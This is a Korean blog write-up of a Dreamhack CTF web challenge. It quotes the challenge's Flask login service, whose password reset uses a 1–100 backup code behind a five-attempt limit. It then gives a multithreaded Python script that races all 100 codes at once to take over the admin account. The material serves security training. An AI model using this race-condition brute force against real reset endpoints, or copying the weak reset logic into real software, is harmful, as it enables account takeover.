코드를 보자
#!/usr/bin/python3
from flask import Flask, request, render_template, make_response, redirect, url_for, session, g
import sqlite3
import hashlib
import os
import time, random
app = Flask(__name__)
app.secret_key = os.urandom(32)
DATABASE = "database.db"
userLevel = {
0 : 'guest',
1 : 'admin'
}
MAXRESETCOUNT = 5
try:
FLAG = open('./flag.txt', 'r').read()
except:
FLAG = '[**FLAG**]'
def makeBackupcode():
return random.randrange(100)
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = sqlite3.connect(DATABASE)
db.row_factory = sqlite3.Row
return db
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
@app.route('/')
def index():
return render_template('index.html')
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'GET':
return render_template('login.html')
else:
userid = request.form.get("userid")
password = request.form.get("password")
conn = get_db()
cur = conn.cursor()
user = cur.execute('SELECT * FROM user WHERE id = ? and pw = ?', (userid, hashlib.sha256(password.encode()).hexdigest() )).fetchone()
if user:
session['idx'] = user['idx']
session['userid'] = user['id']
session['name'] = user['name']
session['level'] = userLevel[user['level']]
return redirect(url_for('index'))
return "<script>alert('Wrong id/pw');history.back(-1);</script>";
@app.route('/logout')
def logout():
session.clear()
return redirect(url_for('index'))
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'GET':
return render_template('register.html')
else:
userid = request.form.get("userid")
password = request.form.get("password")
name = request.form.get("name")
conn = get_db()
cur = conn.cursor()
user = cur.execute('SELECT * FROM user WHERE id = ?', (userid,)).fetchone()
if user:
return "<script>alert('Already Exists userid.');history.back(-1);</script>";
backupCode = makeBackupcode()
sql = "INSERT INTO user(id, pw, name, level, backupCode) VALUES (?, ?, ?, ?, ?)"
cur.execute(sql, (userid, hashlib.sha256(password.encode()).hexdigest(), name, 0, backupCode))
conn.commit()
return render_template("index.html", msg=f"<b>Register Success.</b><br/>Your BackupCode : {backupCode}")
@app.route('/forgot_password', methods=['GET', 'POST'])
def forgot_password():
if request.method == 'GET':
return render_template('forgot.html')
else:
userid = request.form.get("userid")
newpassword = request.form.get("newpassword")
backupCode = request.form.get("backupCode", type=int)
conn = get_db()
cur = conn.cursor()
user = cur.execute('SELECT * FROM user WHERE id = ?', (userid,)).fetchone()
if user:
# security for brute force Attack.
time.sleep(1)
if user['resetCount'] == MAXRESETCOUNT:
return "<script>alert('reset Count Exceed.');history.back(-1);</script>"
if user['backupCode'] == backupCode:
newbackupCode = makeBackupcode()
updateSQL = "UPDATE user set pw = ?, backupCode = ?, resetCount = 0 where idx = ?"
cur.execute(updateSQL, (hashlib.sha256(newpassword.encode()).hexdigest(), newbackupCode, str(user['idx'])))
msg = f"<b>Password Change Success.</b><br/>New BackupCode : {newbackupCode}"
else:
updateSQL = "UPDATE user set resetCount = resetCount+1 where idx = ?"
cur.execute(updateSQL, (str(user['idx'])))
msg = f"Wrong BackupCode !<br/><b>Left Count : </b> {(MAXRESETCOUNT-1)-user['resetCount']}"
conn.commit()
return render_template("index.html", msg=msg)
return "<script>alert('User Not Found.');history.back(-1);</script>";
@app.route('/user/<int:useridx>')
def users(useridx):
conn = get_db()
cur = conn.cursor()
user = cur.execute('SELECT * FROM user WHERE idx = ?;', [str(useridx)]).fetchone()
if user:
return render_template('user.html', user=user)
return "<script>alert('User Not Found.');history.back(-1);</script>";
@app.route('/admin')
def admin():
if session and (session['level'] == userLevel[1]):
return FLAG
return "Only Admin !"
app.run(host='0.0.0.0', port=8000)
간단히 요약하자면, 로그인 서비스가 존재하고 admin권한이 있는 계정으로 로그인하면 된다. /user/[idx]를 입력하면 계정들을 하나씩 확인이 가능하다.
/user/1로 들어가니 바로 admin 권한이 있는 user을 찾았다.
이제 해당 계정으로 로그인하면 되는데,
위 코드는 비밀번호를 변경하는 서비스에 대한 코드이다. 위 코드를 보면 user가 존재할 경우 time.sleep(1)을 한 후 비번 변경이 가능하다. 이때 backupCode라는 것이 존재하고 해당 코드가 일치할 때만 변경이 가능하다. 이 코드는 계정이 생성될 때 1 ~ 100 사이의 코드로 설정이 된다.
비번 실패 제한횟수도 5번 이상으로 걸려 있기 때문에 일반적인 브루트 포싱으로는 불가능하다. 따라서 멀티 스레드 방식으로 동시에 공유 자원에 접근하여 backupCode를 비교할 경우 한 번에 100개의 비교가 가능하다.
time.sleep(1)이 없어도 문제가 될거 같지는 않다.
import threading, requests
url = 'http://host3.dreamhack.games:17097/forgot_password'
def BruteForce(backupCode):
data = {
'userid': 'Dog',
'newpassword': 'Dog',
'backupCode': backupCode
}
requests.post(url, data=data)
print(f"{backupCode}번 스레드의 요청")
if __name__ == "__main__":
threads = []
for i in range(1, 101):
thread = threading.Thread(target=BruteForce, args=[i])
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
print("END")
'Web Hacking > Dreamhack' 카테고리의 다른 글
[Dreamhack] chocoshop write up (2) | 2024.04.20 |
---|---|
[Dreamhack] web-deserialize-python write up (0) | 2024.04.16 |
[Dreamhack] what-is-my-ip write up (1) | 2024.04.13 |
[Dreamhack] out of money write up (0) | 2024.04.12 |
[Dreamhack] tmitter write up (0) | 2024.04.11 |